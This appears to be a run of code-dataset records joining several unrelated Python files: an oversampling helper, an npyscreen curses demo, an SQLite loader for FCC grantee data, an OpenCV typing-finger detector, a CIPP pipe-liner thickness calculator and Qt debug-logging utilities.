if len(nominal) >= 1:\n for feature in nominal:\n si[feature] = most_common_nominal[feature]\n syn_data.append(si)\n number_of_added_data += 1\n\n # Build the data matrix\n new_y = []\n for i in range(len(syn_data)):\n new_y.append(int(complex_model.predict([syn_data[i]])))\n\n new_y_df = pd.DataFrame({target_column: new_y})\n new_df = pd.DataFrame(syn_data)\n new_df.reset_index(drop=True, inplace=True)\n new_df = pd.concat([new_df, new_y_df], axis=1)\n\n return new_df\n","sub_path":"adasyn_optimal.py","file_name":"adasyn_optimal.py","file_ext":"py","file_size_in_byte":5089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"451203732","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n# apt-get install python-tk\n#from Tkinter import *\nimport os, time\nimport weakref\nimport npyscreen\nimport curses\nimport select, os\nfrom npyscreen import MultiLine\n\nclass ActionControllerSearch(npyscreen.ActionControllerSimple):\n def create(self):\n self.add_action('^/.*', self.set_search, True)\n\n def set_search(self, command_line, widget_proxy, live):\n self.parent.value.set_filter(command_line[1:])\n self.parent.wMain.values = self.parent.value.get()\n self.parent.wMain.display()\n\nclass MyTextCommandBox(npyscreen.TextCommandBox):\n def __init__(self, screen, \n history=False, \n history_max=100, \n set_up_history_keys=True,\n *args, **keywords):\n super(MyTextCommandBox, self).__init__(screen, history=history, history_max=history_max, \n set_up_history_keys=set_up_history_keys, *args, **keywords)\n self.keypress_timeout = 5\n def set_up_handlers(self):\n super(MyTextCommandBox, self).set_up_handlers()\n self.keypress_timeout = 5\n def pass_control(self, command):\n self.parent.action_controller.process_control(command, weakref.proxy(self))\n def while_waiting(self):\n self.parent.while_waiting()\n\n\nclass FmSearchActive(npyscreen.FormMuttActiveTraditional):\n ACTION_CONTROLLER = ActionControllerSearch\n COMMAND_WIDGET_CLASS = MyTextCommandBox\n\nclass TestApp(npyscreen.NPSApp):\n def main(self):\n F = FmSearchActive()\n F.wStatus1.value = \"Status Line \"\n F.wStatus2.value = \"Second Status Line \"\n F.value.set_values([str(x) for x in range(500)])\n F.wMain.values = F.value.get()\n\n F.edit()\n\n\nif __name__ == \"__main__\":\n App = TestApp()\n App.run()\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"198173972","text":"import sqlite3\nfrom pyFCC.archive import parse_fccid\n\n# creates a sqlite database for use with grantee data\ndef create_grantee_table():\n conn = sqlite3.connect('FCC.db')\n c = conn.cursor()\n\n c.execute(\"\"\"DROP TABLE IF EXISTS grantees\"\"\")\n conn.commit()\n\n c.execute('''CREATE TABLE grantees\n (grantee_code int PRIMARY KEY NOT NULL, \n grantee_name text,\n mailing_address text,\n po_box text,\n city text,\n state text,\n country text,\n zip_code text,\n contact_name text,\n date_received text)''')\n conn.commit()\n c.close()\n print(\"Grantee table created in FCC.db\")\n\ndef create_product_table():\n conn = sqlite3.connect('FCC.db')\n c = conn.cursor()\n\n c.execute('''CREATE TABLE IF NOT EXISTS products\n (grantee_code int NOT NULL REFERENCES grantees(grantee_code), \n product_code text,\n url text,\n high_freq text,\n low_freq text,\n version text,\n UNIQUE(grantee_code, product_code, version))''') #version doesn't currently have anything\n conn.commit()\n c.close()\n print(\"Product table created in FCC.db\")\n\n# populates an existing database table with grantee data\ndef populate_grantees(granteeTest):\n conn = sqlite3.connect('FCC.db')\n c = conn.cursor()\n c.executemany('INSERT INTO grantees VALUES (?,?,?,?,?,?,?,?,?,?)', granteeTest)\n conn.commit()\n c.close()\n print(\"Grantee Table populated in FCC.db\")\n\n# populates an existing database table with product data\ndef populate_products(productsTest):\n productList = []\n for key, value in productsTest.items():\n for version, row in enumerate(value, 1):\n detail_url, ID, low, high = row\n appid, productid = parse_fccid(ID)\n row = (appid, productid, detail_url, high, low, version)\n productList.append(row)\n\n conn = sqlite3.connect('FCC.db')\n c = conn.cursor()\n c.executemany('INSERT OR IGNORE INTO products VALUES (?,?,?,?,?,?)', productList)\n conn.commit()\n c.close()\n print(\"Product Table populated in FCC.db\")\n\n","sub_path":"pyFCC/fccDB.py","file_name":"fccDB.py","file_ext":"py","file_size_in_byte":2261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"355046435","text":"# coding: UTF-8\r\n# keycode_microtime.csvから入力されたキーコードと入力時間keycのデータを読み込み、画像処理によりどの指で押されたかの情報を取得して付加し、keycode_microtime_finger.csvへ出力\r\nimport numpy as np\r\nimport cv2\r\nimport csv\r\nimport random\r\nimport sys\r\nimport math\r\n\r\n# なんか謎のエラー https://stackoverflow.com/questions/21296475/python-dateutil-unicode-warning を防止\r\nimport warnings\r\nwarnings.filterwarnings(\"ignore\", category=UnicodeWarning)\r\n\r\nFPS = 30\r\nMOVIENAME = './IMG_0945.MOV'\r\n\r\nwhere_key = {}\r\nwhere_key['q'] = [295, 378]\r\nwhere_key['w'] = [420, 380]\r\nwhere_key['e'] = [540, 382]\r\nwhere_key['r'] = [665, 385]\r\nwhere_key['t'] = [787, 386]\r\nwhere_key['y'] = [913, 388]\r\nwhere_key['u'] = [1040, 390]\r\nwhere_key['i'] = [1166, 392]\r\nwhere_key['o'] = [1294, 396]\r\nwhere_key['p'] = [1423, 397]\r\nwhere_key['a'] = [340, 487]\r\nwhere_key['s'] = [458, 489]\r\nwhere_key['d'] = [578, 490]\r\nwhere_key['f'] = [696, 494]\r\nwhere_key['g'] = [818, 497]\r\nwhere_key['h'] = [939, 500]\r\nwhere_key['j'] = [1062, 502]\r\nwhere_key['k'] = [1186, 506]\r\nwhere_key['l'] = [1310, 508]\r\nwhere_key['z'] = [415, 595]\r\nwhere_key['x'] = [530, 594]\r\nwhere_key['c'] = [647, 597]\r\nwhere_key['v'] = [765, 602]\r\nwhere_key['b'] = [882, 604]\r\nwhere_key['n'] = [999, 607]\r\nwhere_key['m'] = [1119, 610]\r\n\r\nneiborhood8 = np.array([\r\n [1, 1, 1],\r\n [1, 1, 1],\r\n [1, 1, 1]],\r\n np.uint8)\r\n\r\ndef erode(img):\r\n img_erosion = cv2.erode(img, neiborhood8, iterations=30)\r\n return img_erosion\r\n \r\ndef erode2(img):\r\n img_erosion = cv2.erode(img, neiborhood8, iterations=15)\r\n return img_erosion\r\n \r\ndef dilate(img):\r\n img_dilation = cv2.dilate(img, neiborhood8, iterations=10)\r\n return img_dilation\r\n\r\ndef color(img, color):\r\n hsv_img = cv2.cvtColor(img, cv2.COLOR_BGR2HSV) # hsv形式\r\n # 取得する色の範囲を指定\r\n # color: blue, pink, green\r\n if color == 'blue':\r\n lower = np.array([80, 80, 70])\r\n upper = np.array([116, 255, 255])\r\n elif color == 'green':\r\n lower = np.array([20, 40, 30])\r\n upper = np.array([90, 255, 255])\r\n\r\n # 指定した色に基づいたマスクの生成\r\n img_mask = cv2.inRange(hsv_img, lower, upper)\r\n # 画像とマスクの共通の領域を抽出\r\n return cv2.bitwise_and(img, img, mask=img_mask)\r\n\r\ndef map_cog(src, img):\r\n thresh = 30\r\n\r\n binary = cv2.threshold(cv2.cvtColor(src, cv2.COLOR_BGR2GRAY), thresh, 255, cv2.THRESH_BINARY)[1] # 2値化\r\n n, label, contours, cogs = cv2.connectedComponentsWithStats(binary)\r\n print(n)\r\n\r\n # 重心\r\n cog_positions = []\r\n for i in range(n):\r\n # skip overall cog\r\n if i==0:\r\n continue\r\n\r\n cog_pos = [int(cogs[i][0]), int(cogs[i][1])]\r\n cog_positions.append(cog_pos)\r\n img = cv2.circle(img, (int(cogs[i][0]), int(cogs[i][1])), 10, (0, 0, 255), -1)\r\n return cog_positions\r\n\r\ndef dst_double(src, dst):\r\n return math.sqrt((dst[0] - src[0])**2 + (dst[1] - src[1])**2)\r\n\r\n# 画像フレームから運指を取得\r\ndef get_finger_id(arg_keycode, arg_frame):\r\n # タイミングに応じてframeをcaptureしてimread\r\n if chr(arg_keycode) == ' ':\r\n return 4\r\n img = arg_frame\r\n height = img.shape[0]\r\n width = img.shape[1]\r\n cv2.rectangle(img, (int(width), int(height/3)), (width-1, height-1), (255, 255, 255), -1)\r\n\r\n target_key_position = [where_key[chr(arg_keycode)][0], where_key[chr(arg_keycode)][1]] # test\r\n\r\n\r\n # img = cv2.circle(img, (50, 200), 20, (0, 0, 255), -1)\r\n\r\n blue_part_pre = color(img, 'blue')\r\n green_part_pre = color(img, 'green')\r\n cv2.namedWindow(\"blue_part_hsv\")\r\n cv2.imshow(\"blue_part_hsv\", blue_part_pre)\r\n # cv2.resizeWindow('blue_part_hsv', 1280, 720)\r\n cv2.namedWindow(\"green_part_hsv\")\r\n cv2.imshow(\"green_part_hsv\", green_part_pre)\r\n # cv2.resizeWindow('green_part_hsv', 1280, 720)\r\n\r\n blue_part = erode(color(img, 'blue'))\r\n blue_part = dilate(blue_part)\r\n green_part = erode2(color(img, 'green'))\r\n\r\n #cv2.rectangle(green_part, (width, height/4), (width-1, height-1), (0, 0, 0), -1)\r\n\r\n # 重心をもとに各指の位置同定\r\n blue_cog_positions = np.sort(map_cog(blue_part, img), axis=0)\r\n green_cog_positions = np.sort(map_cog(green_part, img), axis=0)\r\n print(blue_cog_positions)\r\n print(green_cog_positions)\r\n\r\n thresh = 30\r\n\r\n binary_blue = cv2.threshold(cv2.cvtColor(blue_part, cv2.COLOR_BGR2GRAY), thresh, 255, cv2.THRESH_BINARY)[1] # 2値化\r\n # binary_blue = cv2.bitwise_not(blue_part)\r\n cv2.namedWindow(\"binary_blue\")\r\n \r\n cv2.imshow(\"binary_blue\", binary_blue)\r\n # cv2.resizeWindow('binary_blue', 1280, 720)\r\n\r\n binary_green = cv2.threshold(cv2.cvtColor(green_part, cv2.COLOR_BGR2GRAY), thresh, 255, cv2.THRESH_BINARY)[1] # 2値化\r\n # binary_green = cv2.bitwise_not(green_part)\r\n cv2.namedWindow(\"binary_green\")\r\n \r\n cv2.imshow(\"binary_green\", binary_green)\r\n # cv2.resizeWindow('binary_green', 1280, 720)\r\n\r\n # さらにそのタイミングでのキー位置を取得\r\n\r\n # graphic\r\n WINDOW_1 = \"erode30_blue\"\r\n WINDOW_2 = \"erode15_green\"\r\n WINDOW_3 = \"detect\"\r\n #WINDOW_4 = \"4\"\r\n #WINDOW_5 = \"5\"\r\n cv2.namedWindow(WINDOW_1)\r\n cv2.namedWindow(WINDOW_2)\r\n cv2.namedWindow(WINDOW_3)\r\n #cv2.namedWindow(WINDOW_4)\r\n #cv2.namedWindow(WINDOW_5)\r\n \r\n cv2.imshow(WINDOW_1, blue_part)\r\n cv2.imshow(WINDOW_2, green_part)\r\n cv2.imshow(WINDOW_3, img)\r\n # cv2.resizeWindow(WINDOW_1, 1280, 720)\r\n # cv2.resizeWindow(WINDOW_2, 1280, 720)\r\n # cv2.resizeWindow(WINDOW_3, 1280, 720)\r\n cv2.waitKey(0)\r\n cv2.destroyAllWindows()\r\n\r\n # 適切なキーに最も近い指を確定\r\n if blue_cog_positions.shape[0] != 4 or green_cog_positions.shape[0] != 4:\r\n return -1\r\n\r\n r_ko = blue_cog_positions[0]\r\n r_ks = green_cog_positions[0]\r\n r_na = blue_cog_positions[1]\r\n r_hi = green_cog_positions[1]\r\n l_hi = blue_cog_positions[2]\r\n l_na = green_cog_positions[2]\r\n l_ks = blue_cog_positions[3]\r\n l_ko = green_cog_positions[3]\r\n\r\n arr = np.array([dst_double(r_ko, target_key_position),\r\n dst_double(r_ks, target_key_position),\r\n dst_double(r_na, target_key_position),\r\n dst_double(r_hi, target_key_position),\r\n 9999999.9,\r\n 9999999.9,\r\n dst_double(l_hi, target_key_position),\r\n dst_double(l_na, target_key_position),\r\n dst_double(l_ks, target_key_position),\r\n dst_double(l_ko, target_key_position)])\r\n\r\n print(arr)\r\n print(arr.argmin())\r\n\r\n\r\n\r\n return arr.argmin()\r\n\r\n# csvファイルハンドラ\r\nfr = open('douga_keycode_microtime.csv', 'rb')\r\nfw = open('keycode_microtime_finger.csv', 'w')\r\ndataReader = csv.reader(fr)\r\ndataWriter = csv.writer(fw, lineterminator='\\n')\r\n\r\n# キーコードと入力時間のデータを格納する辞書の配列\r\nkeycode_microtimes = []\r\nfor (i, row) in enumerate(dataReader):\r\n keycode_microtimes.append({})\r\n keycode_microtimes[i]['keycode'] = int(row[0])\r\n keycode_microtimes[i]['microtime'] = int(row[1])\r\n keycode_microtimes[i]['isCorrect'] = int(row[2])\r\n\r\n\r\n# strを数値形式にする & 入力時間をフレームに変��\r\nfor keycode_microtime in keycode_microtimes:\r\n keycode_microtime['keycode'] = keycode_microtime['keycode']\r\n keycode_microtime['frame'] = int(round(float(keycode_microtime['microtime']) / 1000000.0 * FPS))\r\n\r\n#### ここから、動画の入力開始位置合わせ (usage: 入力開始位置フレームでqを押す。 入力開始位置フレームじゃない時はq以外を押すと次のフレームへ移動する。)\r\ncap = cv2.VideoCapture(MOVIENAME)\r\n\r\n# cv2.namedWindow('image', cv2.WINDOW_NORMAL)\r\n# cv2.resizeWindow('image', 1280, 720)\r\n\r\nframecount = 0\r\nwhile(cap.isOpened()):\r\n # 1フレーム読む\r\n ret, frame = cap.read()\r\n \r\n # 読めなかったら抜ける\r\n if ret == False:\r\n break\r\n \r\n # 画面にフレームを表示\r\n cv2.namedWindow('image', cv2.WINDOW_NORMAL)\r\n \r\n\r\n cv2.imshow('image', frame)\r\n # cv2.resizeWindow('image', 1280, 720)\r\n \r\n # qが押されたら抜ける(入力開始位置)、q以外を押すと次のフレームへ\r\n inputkeycode = cv2.waitKey(0)\r\n if inputkeycode == 113:\r\n break\r\n \r\n framecount += 1\r\n\r\n# 入力開始位置分だけフレーム数をオフセット\r\nfor keycode_microtime in keycode_microtimes:\r\n keycode_microtime['frame'] += framecount\r\n\r\ncap.release()\r\n\r\ncv2.destroyAllWindows()\r\n\r\ncap = cv2.VideoCapture(MOVIENAME)\r\n\r\n#### ここから、入力に対応する画像フレームから画像処理で運指情報を抜き出し\r\nframecount = 0\r\n# 今何個目のキー入力まで運指情報取得が終わったか\r\nkeycode_microtimes_count = 0\r\nbreakflag = 0\r\nwhile(cap.isOpened()):\r\n # 1フレーム読む\r\n ret, frame = cap.read()\r\n \r\n # 読めなかったら抜ける\r\n if ret == False:\r\n break\r\n \r\n while keycode_microtimes_count < len(keycode_microtimes) and framecount == keycode_microtimes[keycode_microtimes_count]['frame'] :\r\n # 画像処理して運指を取得\r\n keycode_microtimes[keycode_microtimes_count]['finger_id'] = get_finger_id(keycode_microtimes[keycode_microtimes_count]['keycode'], frame)\r\n windowname = chr(keycode_microtimes[keycode_microtimes_count]['keycode'])\r\n # cv2.namedWindow(windowname, cv2.WINDOW_NORMAL)\r\n # cv2.resizeWindow(windowname, 1280, 720)\r\n # cv2.imshow(windowname, frame)\r\n # inputkeycode = cv2.waitKey(0)\r\n # if inputkeycode == 27:\r\n # breakflag = 1\r\n # break\r\n # cv2.destroyAllWindows()\r\n keycode_microtimes_count += 1\r\n if breakflag == 1:\r\n break\r\n framecount += 1\r\n \r\n\r\n#### CSVへ書き出し\r\nfor i in xrange(0, len(keycode_microtimes)): \r\n csv_writerow = []\r\n csv_writerow.append(keycode_microtimes[i]['keycode'])\r\n csv_writerow.append(keycode_microtimes[i]['microtime'])\r\n csv_writerow.append(keycode_microtimes[i]['isCorrect'])\r\n csv_writerow.append(keycode_microtimes[i]['frame'])\r\n csv_writerow.append(keycode_microtimes[i]['finger_id'])\r\n dataWriter.writerow(csv_writerow)\r\n\r\nfr.close()\r\nfw.close()\r\n \r\ncv2.destroyAllWindows()","sub_path":"TypeFingerDetector/TypeFingerDetector/Release/demo_imageProcessing.py","file_name":"demo_imageProcessing.py","file_ext":"py","file_size_in_byte":10373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"626611322","text":"from math import trunc, exp, pi\n\nclass LinerManager(object):\n '''Instances of the LinerManager class take a dictionary of keys and\n values and determine the thickness of the CIPP liner'''\n # Standard live load table for AASHTO H20 highway loads,# Cooper E-80\n # rail, or 180 kip airplane gear load. Impact factors have already been\n # integrated.\n live_load_hwy = {\n 2:5.56, 3:4.17, 4:2.78, 5:1.74, 6:1.39, 7:1.22, 8:0.69\n }\n live_load_rail = {\n 2:26.39, 3:23.61, 4:18.4, 5:16.67, 6:15.63, 7:12.15,\n 8: 11.11, 10:7.64, 12:5.56, 14:4.17, 16:3.47, 18:2.78,\n 20:2.08, 22:1.91, 24:1.74, 26:1.39, 28:1.04, 30:0.69\n }\n live_load_arpt = {\n 2:13.14, 3:12.28, 4:11.27, 5:10.09, 6:8.79, 7:7.85,\n 8:6.93, 10:6.09, 12:4.76, 14:3.06, 16:2.29, 18:1.91,\n 20:1.53, 22:1.14, 24:1.05\n }\n \n def __init__(self, vardict):\n # The enhancement_factor and soil_mod are submitted exclusivly with\n # the dictionary. The following if statements prevent key failures\n if 'enhancement_factor' not in vardict:\n vardict['enhancement_factor'] = ''\n if 'soil_mod' not in vardict:\n vardict['soil_mod'] = ''\n \n # If value is left blank, assume default (ASTM)\n\n default_values = {\n 'design_modulus':250000, 'design_flexural_strength':4500,\n 'safety_factor':2.0, 'ret_factor':50, 'ovality':3.0,\n 'enhancement_factor':7.0, 'gw_level':0.0, 'soil_density':140,\n 'poissons':0.3, 'soil_mod':700, 'n_host':0.013, 'n_liner':0.010,\n 'host_age':50\n }\n \n for key, value in vardict.items():\n if vardict[key] == '':\n vardict[key] = default_values[key]\n \n #tempvardict = {}\n \n #for key, value in vardict.items():\n #tempvardict['self.'+key] = vardict[key]\n \n #vardict = tempvardict\n \n for key, value in vardict.items():\n try:\n float(vardict[key])\n vardict[key] = float(vardict[key])\n except:\n vardict[key] = vardict[key]\n \n self.vardict = vardict\n \n # Calculated variables\n self.vardict['soil_depth'] = (vardict['surface_to_invert']\n -(vardict['host_diameter'])/12)\n self.vardict['gw_head'] = (vardict['surface_to_invert']\n - vardict['gw_level'])\n if self.vardict['gw_head'] <= 0:\n self.vardict['gw_head'] = 0\n self.vardict['ov_red_fact'] = (((1-(vardict['ovality']/100))/((1+(\n vardict['ovality']/100))**2))**3)\n self.vardict['lng_term_modulus'] = ((vardict['ret_factor']/100)\n *vardict['design_modulus'])\n self.vardict['lng_term_flex_strength'] = (\n (vardict['ret_factor']/100)\n *vardict['design_flexural_strength'])\n self.vardict['gw_load'] = self.vardict['gw_head']/2.31\n\n \n def x1p1(self):\n '''X1.1 - Partially deteriorated gravity pipe condition support\n hydraulic load of groundwater'''\n # Pull variables from dictionary\n dia = self.vardict['host_diameter']\n ef = self.vardict['enhancement_factor']\n mod = self.vardict['lng_term_modulus']\n oval = self.vardict['ov_red_fact']\n mu = self.vardict['poissons']\n FS = self.vardict['safety_factor']\n gwload = self.vardict['gw_load']\n \n # Calculate\n sdr = (((2*ef*mod*oval)/((1-(mu**2))*gwload*FS))**(1.0/3.0))\n liner_thickness_x1p1 = dia/sdr\n return liner_thickness_x1p1\n\n def x1p2(self):\n '''X1.2 - If there is no groundwater above the pipe, the CIPP should \n have a maximum SDR of 100'''\n # Pull variables from dictionary\n dia = self.vardict['host_diameter'] \n gwhead = self.vardict['gw_head']\n \n # Calculate\n if (gwhead <= 0):\n liner_thickness_x1p2 = dia/100\n return liner_thickness_x1p2\n else:\n return 0\n\n def x1p2p1p1(self):\n '''X1.2.1.1 - if the original pipe is oval, the design from X1.1 shall\n have a minimum thickness as calculated by:'''\n # Pull variables from dictionary\n dia = self.vardict['host_diameter'] \n oval = self.vardict['ov_red_fact']\n flex = self.vardict['lng_term_flex_strength']\n FS = self.vardict['safety_factor']\n gwload = self.vardict['gw_load']\n \n # Calculate\n pythag_A = (1.5*(oval/100))*(1+(oval/100))\n pythag_B = (-0.5*(1+((oval/100))))\n pythag_C = -flex/(gwload*FS)\n root_1 = (-pythag_B+((pythag_B**2)-(4*pythag_A*pythag_C))**(0.5))/(2*pythag_A)\n root_2 = (-pythag_B-((pythag_B**2)-(4*pythag_A*pythag_C))**(0.5))/(2*pythag_A)\n if (root_1 < 0):\n root_1 = 999\n if (root_2 < 0):\n root_2 = 999\n root = min(root_1, root_2)\n liner_thickness_x1p2p1p1 = dia/root\n return liner_thickness_x1p2p1p1\n\n \n\n \"\"\" For non-standard live loads, or concentrated load, use eq. and impact factors.\n Load eq.\n Pp = 3*Ps / 2*pi*(C^2)*((1+((d/c)^2))^2.5)\n Pp = pressure transmitted to pipe\n Ps = Load at surface (lbs)\n C = depth of cover (in for psi, ft for psf)\n d = horiz. offset distance from pipe to line of application of surface load (in for psi, ft for psf)\n\n #Impact factor - if less than x, y. If over x>3 use y4.\n imp_fact_hwy = { 1:1.5, 2:1.35, 3:1.15, 100:1.0 }\n imp_fact_rail = { 1:1.75, 2:1.5, 3:1.5, 100:1.35 }\n imp_fact_arpt = { 1:1.5, 2:1.35, 3:1.35, 100:1.15 }\n\n # Triggers for specialized investigation if load area > 10 sq ft and:\n # 500 psf for pre-1941 pipelines\n # 1000 psf for 12-inch diameter or larger\n # 1500 psf for pipelines smaller than 12-inch dia\n \"\"\"\n\n def live_load_determination(self):\n ''' X1.2.2 - Fully deteriorated gravity pipe. Designed to support hydraulic, soil, and live loads.\n Live load calculation method must be determined\n Standard using AASHTO charts'''\n # Pull variables from dictionary\n location = self.vardict['location']\n depth = self.vardict['soil_depth']\n\n # Determine Live Load\n if (location == 'Highway'):\n if (depth >= 10):\n live_load = 0\n elif (depth >8 and depth < 10):\n live_load = 0.69\n elif (depth < 2):\n live_load = 5.56\n else:\n live_load_index = trunc(depth)\n live_load = self.live_load_hwy[live_load_index]\n elif (location == 'Rail'):\n if (depth > 30):\n live_load = 0\n elif (depth >8 and depth <= 30):\n live_load_index = 2*trunc(0.5*depth)\n live_load = self.live_load_rail[live_load_index]\n elif (depth < 2):\n live_load = 26.39\n else:\n live_load_index = trunc(depth)\n live_load = self.live_load_rail[live_load_index]\n elif (location == 'Airport'):\n if (depth > 24):\n live_load = 0\n elif (depth >8 and depth <= 24):\n live_load_index = 2*trunc(0.5*depth)\n live_load = self.live_load_arpt[live_load_index]\n elif (depth < 2):\n live_load = 13.14\n else:\n live_load_index = trunc(depth)\n live_load = self.live_load_arpt[live_load_index]\n else:\n live_load = None\n return live_load\n\n def x1p2p2(self):\n # Pull variables from dictionary\n dia = self.vardict['host_diameter']\n gwhead = self.vardict['gw_head']\n depth = self.vardict['soil_depth']\n W = self.vardict['soil_density']\n FS = self.vardict['safety_factor']\n smod = self.vardict['soil_mod']\n oval = self.vardict['ov_red_fact']\n mod = self.vardict['lng_term_modulus']\n \n # Calculate\n adjusted_gwhead = gwhead - (dia/12)\n Rw_calc = 1.0-(0.33*(adjusted_gwhead/depth))\n Rw_min = 0.67\n Rw_max = 1.0\n Rw = min(Rw_calc, Rw_min)\n Rw = Rw_max if Rw > Rw_max else Rw #Water buoyancy factor\n Qt = ((0.433*adjusted_gwhead)+((W*depth*Rw)/144)\n +self.live_load_determination())\n B_prime = 1/(1+(4*(exp(-0.065*depth)))) #Coef of elastic support\n mom_inert = ((dia**3)*((FS*Qt)**2))/(32*Rw*B_prime*smod*oval*mod)\n liner_thickness_x1p2p2 = (12*mom_inert)**(1/3)\n return liner_thickness_x1p2p2\n\n def x1p2p2p1(self):\n # Pull variables from dictionary\n dia = self.vardict['host_diameter']\n des_mod = self.vardict['design_modulus']\n \n # Calculate\n mom_inert_min = (0.093*(dia**3))/des_mod\n liner_thickness_x1p2p2p1 = (12.0*mom_inert_min)**(1/3)\n return liner_thickness_x1p2p2p1 \n \n def thickness_formater(self): #formatted\n # Pull variables from dictionary\n condition = self.vardict['design_condition']\n gwload = self.vardict['gw_load']\n thickness = self.thickness_calc()\n \n # Format\n if (condition == 'Partially Deteriorated'):\n if (gwload <= 0):\n liner_thickness = 'No hydraulic loading, design as fully deteriorated or use minimum thickness.'\n else:\n liner_thickness = str('{0:.2f}'.format(thickness*25.4)) + 'mm'\n elif (condition == 'Fully Deteriorated'):\n liner_thickness = str('{0:.2f}'.format(thickness*25.4)) + 'mm'\n else:\n liner_thickness = 'error'\n \n return liner_thickness\n \n def thickness_calc(self): #unformatted\n # Pull variables from dictionary\n condition = self.vardict['design_condition']\n gwload = self.vardict['gw_load']\n\n # Calculate\n if (condition == 'Partially Deteriorated'):\n if gwload <= 0:\n liner_thickness = 0\n else:\n liner_thickness = max(self.x1p1(), self.x1p2(), self.x1p2p1p1()) #output is in inches\n elif (condition == 'Fully Deteriorated'):\n liner_thickness = max(self.x1p2p2(), self.x1p2p2p1()) #output is in inches\n\n return liner_thickness\n \n def flow_change(self):\n # Pull variables from dictionary\n dia = self.vardict['host_diameter']\n liner_t = self.thickness_calc()\n n_host = self.vardict['n_host']\n n_liner = self.vardict['n_liner']\n gwload = self.vardict['gw_load']\n condition = self.vardict['design_condition']\n \n #Calculate\n coeff = 0.608173 #For flow at pipe 2/3 full (design flow level)\n r_host = dia/2\n r_lined = (dia/2)-liner_t\n # First check if liner thickness reduces diameter to zero\n if r_lined <= 0:\n return -100\n else:\n if (condition == 'Partially Deteriorated'):\n if (gwload <= 0):\n deltaQ_pct = 0.0\n return deltaQ_pct\n else:\n A_host = ((pi*r_host**2)*coeff)+(r_host/3)*((((r_host)**2)-((r_host/3)**2))**(0.5))\n pw_host = (2*pi*r_host)*coeff\n A_lined = ((pi*r_lined**2)*coeff)+(r_lined/3)*((((r_lined)**2)-((r_lined/3)**2))**(0.5))\n pw_lined = (2*pi*r_lined)*coeff\n slope = 0.102\n hyd_rad_host = A_host/pw_host\n hyd_rad_lined = A_lined/pw_lined\n q_host = (1.486/n_host)*A_host*(hyd_rad_host**(2/3))*(slope**(1/2))\n q_lined = (1.486/n_liner)*A_lined*(hyd_rad_lined**(2/3))*(slope**(1/2))\n deltaQ = q_lined - q_host\n deltaQ_pct = round((deltaQ/q_host) * 100)\n return deltaQ_pct\n \n def output_dict(self):\n # Convert input variables to nice format\n round_down_to0 = [\n 'design_modulus', 'design_flexural_strength', 'ret_factor',\n 'soil_density', 'soil_mod', 'host_age', 'host_diameter'\n ]\n round_down_to1 = [\n 'safety_factor', 'ovality', 'enhancement_factor', 'gw_level'\n ]\n round_down_to2 = ['poissons']\n round_down_to3 = ['n_host', 'n_liner']\n \n for i in round_down_to0:\n self.vardict[i] = round(self.vardict[i])\n for i in round_down_to1:\n self.vardict[i] = str('{0:.1f}'.format(round(self.vardict[i],1)))\n for i in round_down_to2:\n self.vardict[i] = str('{0:.2f}'.format(round(self.vardict[i],2)))\n for i in round_down_to3:\n self.vardict[i] = str('{0:.3f}'.format(round(self.vardict[i],3)))\n \n # Future - send out for calculations of flow reduction, add to dict\n \n return self.vardict\n\n \n\ndef LM_run(input):\n lm = LinerManager(input)\n thickness = lm.thickness_formater()\n flow_change = lm.flow_change()\n output_dict = lm.output_dict()\n return(thickness, flow_change, output_dict)\n\n\n","sub_path":"cippcalc.py","file_name":"cippcalc.py","file_ext":"py","file_size_in_byte":13351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"55438545","text":"### some qt utils\n\n#from PyQt5 import QtCore\n#from PyQt5.QtCore import QThread, QDateTime\nfrom PyQt5.QtCore import *\n\ndef mygettid():\n ### simple gettid like C's syscall(__NR_gettid)\n import ctypes\n import platform\n\n syscalls = {\n 'i386': 224, # unistd_32.h: #define __NR_gettid 224\n 'x86_64': 186, # unistd_64.h: #define __NR_gettid 186\n }\n libcs = {\n 'i386': '/lib/libc.so.6',\n 'x86_64': '/lib64/libc.so.6',\n }\n # libc = ctypes.CDLL(\"/lib/libc.so.6\")\n libc = ctypes.CDLL(libcs[platform.machine()])\n # tid = ctypes.CDLL('libc.so.6').syscall(224)\n return libc.syscall(syscalls[platform.machine()])\n\n### in msgh: 0 aaaaaaaaa\ndef qt_debug_handler(tp, ctx, msg):\n #print(\"in msgh:\", tp, ctx, msg)\n #print(ctx.function, ctx.file, ctx.line)\n\n tid = QThread.currentThreadId() ### voidstr type\n tid = mygettid()\n tid = str(tid).encode('utf8')\n \n now = QDateTime.currentDateTime()\n tmstr = now.toString(\"yyyy-MM-dd hh:mm:ss\")\n tmstr = tmstr.encode('utf8')\n\n fn = b''\n try:\n if ctx.file is None: # for qt internal msg\n fn = b'qtinternal'\n else:\n fn = ctx.file.encode('utf-8')\n fnl = ctx.file.split('/')\n fn = fnl[len(fnl)-1].encode('utf8')\n except:\n fn = b'errfh'\n\n line = str(ctx.line).encode('utf8')\n function = b''\n try:\n if type(ctx.function) == str:\n function = ctx.function.encode('utf8')\n elif type(ctx.function) == bytes:\n # function = ctx.function.decode('utf8')\n function = ctx.function\n else: function = str(ctx.function).encode('utf8')\n except Exception as ex:\n # print(b'EEE:' + bytes(ctx.function, 'utf8'))\n print('EEE: ctx.function: %s' % str(ctx))\n\n if function == b'': function = b'qtinternal'\n # if ctx.function == None: function = b'qtinternal' # maybe UnicodeDecodeError:\n \n flog = b\"[\" + tmstr + b\"] T(\" + tid + b\") \" + fn + b\":\" + line + b\" \" + function \\\n + b\" -- \" + msg.encode('utf8')\n print(flog.decode('utf8'), flush=True)\n\n#usage\n# qInstallMessageHandler(qt_debug_handler)\n# qDebug('奇点'.encode()), but not qDebug('奇点')\n\n\n###\n### TODO improve qDebug() function\n### 多参数类型的qDebug\n### 并且能够用上qt的 debug handler\n### 不过这样不能正确获取调用栈信息了,还是不能用啊。\ndef qxDebug(*args):\n s = ''\n for arg in args:\n s += str(arg) + ' '\n qDebug(s)\n\n#####\nimport sys, time\nimport signal\n# from PyQt5.QtWidgets import qApp\nfrom PyQt5.QtCore import QCoreApplication\n\n### 